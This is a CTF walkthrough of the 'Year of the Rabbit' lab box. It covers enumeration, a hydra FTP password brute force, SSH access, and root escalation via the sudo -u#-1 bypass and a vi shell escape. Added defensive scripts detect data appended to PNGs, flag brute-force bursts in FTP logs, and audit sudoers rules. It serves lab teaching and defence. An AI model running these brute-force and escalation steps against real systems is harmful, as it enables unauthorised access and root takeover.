Year of the Rabbit

Welcome to the "Year of the Rabbit" — a lighthearted CTF-style box that offers a balanced mix of enumeration, basic exploitation, steganography, and privilege escalation to warm up your hacking skills for the new year. In this walkthrough, we’ll use tools like Nmap, Gobuster, Burpsuite, Hydra, and Steghide to uncover hidden paths, credentials, and ultimately obtain both the user and root flags. Along the way, we’ll practice privilege escalation techniques and learn how seemingly small clues can lead to full system compromise. Let's dive in without falling down the rabbit hole. 🐇
Flags

Let's have a nice gentle start to the New Year!
Can you hack into the Year of the Rabbit box without falling down a hole?
(Please ensure your volume is turned up!)
To start off, we'll enumerate the box and look for hints that might point us to users, their passwords, and ultimately the flags (files or paths).
nmap -sV IP_Address

gobuster dir -u http://IP_Address -w /usr/share/wordlists/dirb/common.txt

Checking under /assets in the browser, there are two files: a CSS file and an MP4 file. Opening the CSS file gives a hint about a PHP file. Switching to that PHP file pops up an alert telling us to turn off JavaScript, and the path behaves like a directory rather than a file.
- /sup3r_s3cr3t_fl4g.php (hinted in the CSS) and the directory sup3r_s3cret_fl4g
- Rick Astley - Never Gonna Give You Up: the MP4 video under /assets (not much help)

Running gobuster further doesn't turn up many useful hints.


We'll try using Burpsuite to intercept. As usual, open Burpsuite, and under the proxy settings enable the browser option. Turn on intercept, open the browser at http://10.10.231.51:80, and add the path to our PHP file, /sup3r_s3cr3t_fl4g.php. Give it a moment and check the responses under the Raw section: a hidden path is revealed.


Going back to the browser and switching to this path, we find an image, which we download.

wget -q http://10.10.84.15/WExYY2Cv-qU/Hot_Babe.png
I tried steghide extract -sf Hot_Babe.png but was not successful, so I opted to use strings.
strings Hot_Babe.png

This reveals a user called ftpuser and a list of possible passwords, which we paste into a file to use as our wordlist for finding the user's password with hydra.
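Why did steghide fail but strings succeed? steghide only supports JPEG, BMP, WAV and AU carriers, so it cannot read a PNG at all, and the credentials here were simply appended as plain bytes after the image's IEND chunk. That is the cheapest kind of concealment and also the easiest to detect. The script below is an added example (not part of the original walkthrough and not the box's image): it walks the PNG chunk structure, reports any bytes that trail the IEND chunk, and extracts printable strings from them. The 1x1 PNG and the appended "credentials" are constructed inline so it runs offline.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def find_appended_data(data: bytes) -> bytes:
    """Walk the chunk list and return whatever follows the IEND chunk.

    A well-formed PNG ends exactly at IEND, so a non-empty result is a
    strong indicator that something was tacked onto the file.
    """
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4          # header + payload + CRC
        if ctype == b"IEND":
            return data[pos:]
    raise ValueError("truncated PNG: no IEND chunk found")


def printable_strings(blob: bytes, min_len: int = 4) -> list:
    """Minimal re-implementation of `strings` for the trailing bytes."""
    out, cur = [], bytearray()
    for b in blob:
        if 32 <= b < 127:
            cur.append(b)
        else:
            if len(cur) >= min_len:
                out.append(cur.decode("ascii"))
            cur = bytearray()
    if len(cur) >= min_len:
        out.append(cur.decode("ascii"))
    return out


def build_png(extra: bytes = b"") -> bytes:
    """Construct a minimal valid 1x1 RGB PNG and optionally append `extra`.

    Constructed sample for the demo; it is not the CTF's Hot_Babe.png.
    """
    def chunk(ctype: bytes, payload: bytes) -> bytes:
        crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
        return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit, RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")            # filter byte + red pixel
    return PNG_SIGNATURE + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"") + extra


if __name__ == "__main__":
    # Constructed "hidden note" in the style the walkthrough found with strings.
    tainted = build_png(b"\x00user: demo_user\npasswords:\nalpha1\nbeta2\n")
    trailing = find_appended_data(tainted)
    print(f"{len(trailing)} bytes after IEND")
    for s in printable_strings(trailing):
        print("  ", s)
```

The check is deliberately structural rather than signature-based: any bytes after IEND are anomalous regardless of what they contain, so it catches appended archives or scripts as readily as a plaintext password list. It does not detect pixel-level (LSB) embedding, which needs statistical analysis instead.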

hydra -l ftpuser -P userpas.txt ftp://10.10.84.15

When we log in to the FTP server with that username and password, we get a file that reveals a new user and their password.
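From the blue-team side, the hydra step above is noisy: it produces a burst of failed logins for one account from one client in a few seconds, followed by a success. The detector below is an added example (not part of the walkthrough) that reads vsftpd-style log lines, groups them by client and account, flags any (client, user) pair with at least `threshold` failures inside a sliding `window_seconds`, and notes whether a successful login followed the burst. The log lines are constructed here in vsftpd's `FAIL LOGIN` / `OK LOGIN` format; the IPs and timestamps are made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# vsftpd.log line shape, e.g.:
#   Tue Jan 14 12:00:01 2025 [pid 1234] [ftpuser] FAIL LOGIN: Client "10.0.0.5"
LOG_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) '
    r'\[pid \d+\] \[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)

# Constructed sample log (not from the box): a 6-attempt burst then a success.
SAMPLE_LOG = """\
Tue Jan 14 12:00:01 2025 [pid 101] [ftpuser] FAIL LOGIN: Client "10.0.0.5"
Tue Jan 14 12:00:02 2025 [pid 102] [ftpuser] FAIL LOGIN: Client "10.0.0.5"
Tue Jan 14 12:00:02 2025 [pid 103] [ftpuser] FAIL LOGIN: Client "10.0.0.5"
Tue Jan 14 12:00:03 2025 [pid 104] [ftpuser] FAIL LOGIN: Client "10.0.0.5"
Tue Jan 14 12:00:03 2025 [pid 105] [ftpuser] FAIL LOGIN: Client "10.0.0.5"
Tue Jan 14 12:00:04 2025 [pid 106] [ftpuser] FAIL LOGIN: Client "10.0.0.5"
Tue Jan 14 12:00:05 2025 [pid 107] [ftpuser] OK LOGIN: Client "10.0.0.5"
Tue Jan 14 12:30:00 2025 [pid 108] [alice] FAIL LOGIN: Client "10.0.0.9"
Tue Jan 14 12:30:20 2025 [pid 109] [alice] OK LOGIN: Client "10.0.0.9"
""".splitlines()


def parse_line(line: str):
    """Return a dict for a login line, or None for lines we don't care about."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return {"ts": ts, "user": m.group("user"), "result": m.group("result"), "ip": m.group("ip")}


def detect_bruteforce(lines, threshold: int = 5, window_seconds: int = 60) -> list:
    """Flag (ip, user) pairs with >= threshold failures inside any window."""
    events = [e for e in map(parse_line, lines) if e]
    by_key = defaultdict(list)
    for e in events:
        by_key[(e["ip"], e["user"])].append(e)

    alerts = []
    for (ip, user), evs in by_key.items():
        fails = sorted(e["ts"] for e in evs if e["result"] == "FAIL")
        flagged = False
        for i in range(len(fails)):            # sliding window over failure times
            j = i
            while j + 1 < len(fails) and (fails[j + 1] - fails[i]).total_seconds() <= window_seconds:
                j += 1
            if j - i + 1 >= threshold:
                flagged = True
                break
        if flagged:
            # A success after the burst means the guess probably worked.
            success_after = any(e["result"] == "OK" and e["ts"] >= fails[0] for e in evs)
            alerts.append({"ip": ip, "user": user, "failures": len(fails), "success_after": success_after})
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG):
        print(a)
```

A single mistyped password (alice above) never trips the rule, while the burst does; tuning `threshold` and `window_seconds` to the service's normal failure rate keeps false positives down. Pairing the alert with `success_after` tells a responder which cases need a credential reset rather than just a block.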


We'll log in using ssh.

Trying to find the user.txt file for the user flag, we're shown the path where it lives, but we don't have permission to read it.

Remember, the SSH login revealed something: s3cr3t
1 new message
Message from Root to Gwendoline:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
END MESSAGE
What is the user flag?
find / -iname 's3cr3t' 2>/dev/null
ls -la
cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!

su - gwendoline
cat user.txt

What is the root flag?
sudo -l
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
then type:
:!/bin/sh
find / -type f -name root.txt 2>/dev/null
cat /root/root.txt
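Two separate misconfigurations combine in the root step above. First, the sudo rule lets gwendoline run vi as any user except root, but older sudo builds resolved the numeric user id -1 (given as `-u#-1`) to uid 0, so the exclusion did nothing. Second, vi offers a shell escape (`:!/bin/sh`), so granting it through sudo is effectively granting a shell as the target user. The auditor below is an added example (not part of the walkthrough and not the box's actual sudoers, which the page does not show): it parses user-specification lines from a sudoers file and flags both patterns. The sample sudoers text is constructed; the gwendoline rule is written to match what the `sudo -u#-1 /usr/bin/vi` command implies.

```python
import re

# Binaries that can spawn a shell from inside (assumed list for the demo).
SHELL_ESCAPE_BINARIES = {"vi", "vim", "view", "less", "more", "man"}

# user  host = (runas_user[:runas_group]) [TAG:] cmd[, cmd...]
RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*'
    r'(?:\((?P<runas>[^)]*)\)\s*)?'
    r'(?P<tags>(?:[A-Z]+:\s*)*)'
    r'(?P<cmds>.+)$'
)

# Constructed sample, not the box's real /etc/sudoers.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
# hypothetical rule consistent with the walkthrough's sudo -u#-1 /usr/bin/vi step
gwendoline      ALL=(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
deploy          ALL=(www-data) NOPASSWD: /usr/bin/systemctl restart app
"""


def parse_rule(line: str):
    """Parse one user-specification line; return None for comments, Defaults, aliases."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    runas = m.group("runas") or "root"            # sudoers default runas user
    runas_users = [u.strip() for u in runas.split(":", 1)[0].split(",")]
    cmds = [c.strip() for c in m.group("cmds").split(",")]
    return {"who": m.group("who"), "runas_users": runas_users, "cmds": cmds}


def audit_sudoers(text: str) -> list:
    """Return findings as dicts with who / issue / detail."""
    findings = []
    for raw in text.splitlines():
        rule = parse_rule(raw)
        if rule is None:
            continue
        negated = [u for u in rule["runas_users"] if u.startswith("!")]
        if negated:
            # '!root' style exclusions are only as strong as sudo's uid parsing;
            # older sudo mapped uid -1 to root, so prefer an explicit allow-list.
            findings.append({"who": rule["who"], "issue": "runas-negation",
                             "detail": f"runas excludes {negated}; use an explicit user list instead"})
        for cmd in rule["cmds"]:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_ESCAPE_BINARIES:
                findings.append({"who": rule["who"], "issue": "shell-escape",
                                 "detail": f"{binary} can spawn a shell (:!cmd); use sudoedit or a wrapper"})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['who']:12} {f['issue']:16} {f['detail']}")
```

The fix the auditor hints at is the usual one: replace the negated runas spec with the specific user the task needs, and replace a raw editor with sudoedit (which copies the file, runs the editor unprivileged, and writes it back) so no shell escape inherits elevated rights. The parser handles the common single-line form only; aliases and line continuations would need more work.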

The "Year of the Rabbit" box was a great exercise in applying foundational skills in web enumeration, FTP/SSH access, steganography, and privilege escalation. Starting with simple recon using Nmap and Gobuster, we uncovered hidden paths and files. The combination of Burpsuite interception and strings analysis on an image led us to valid credentials, which then opened the door to further lateral movement. A hidden message hinted at a concealed file, and with user switching and a shell escape from vi run through sudo, we escalated privileges and captured the root flag. This challenge was a great reminder of how attention to detail and layered enumeration can lead to full system pwnage. 🎯🐰




